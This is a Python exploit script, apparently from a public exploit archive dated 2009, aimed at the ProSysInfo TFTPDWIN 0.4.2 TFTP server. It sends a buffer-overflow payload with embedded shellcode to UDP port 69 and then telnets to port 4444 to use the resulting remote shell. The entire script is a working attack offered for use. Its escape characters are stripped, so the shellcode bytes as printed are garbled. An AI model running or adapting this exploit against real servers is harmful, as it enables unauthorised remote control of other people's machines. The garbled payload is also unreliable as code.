#!/usr/bin/python

#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith

import os
import sys
import struct
import socket
import time


print "nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer lengthn"
 
if len(sys.argv)!=2:
        print "Usage: tftpdwin.py <ip>"
        sys.exit(0)


	
buffer = "x00x01x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
buffer += "x8bxc3x66x05x12x01x50xc3" + "x90"*57

buffer += "x59x81xc9xd3x62x30x20x41x43x4dx64"
buffer += "x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C"
buffer += "x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77"
buffer += "x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60"
buffer += "x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF"
buffer += "x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7"
buffer += "x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B"
buffer += "x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4"
buffer += "x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3"
buffer += "xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4"
buffer += "x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44"
buffer += "x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50"
buffer += "x50x56x50xFFx56xE4xFFx56xE8x90x90x90x90x90x90x90"
buffer += "x42xfbx61x40x00x6ex65x74x61x73x63x69x69x00"


target = sys.argv[1]
def Connect(target):
	connect = "telnet " + target + " 4444"
	os.system(connect)
	
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
	s.sendto(buffer, (target,69))
	print "[*] Initiating Buffer Overflow"
	time.sleep(2)
	print "[*] Attempting Connection to Remote Host"
	time.sleep(2)
	print "[*] Please Wait...n"
	time.sleep(3)
	Connect(target)
	print "nClosing Remote Connectionn"
	sys.exit(0)
except:
	print "Goodbyen"	

# www.Syue.com [2009-08-18]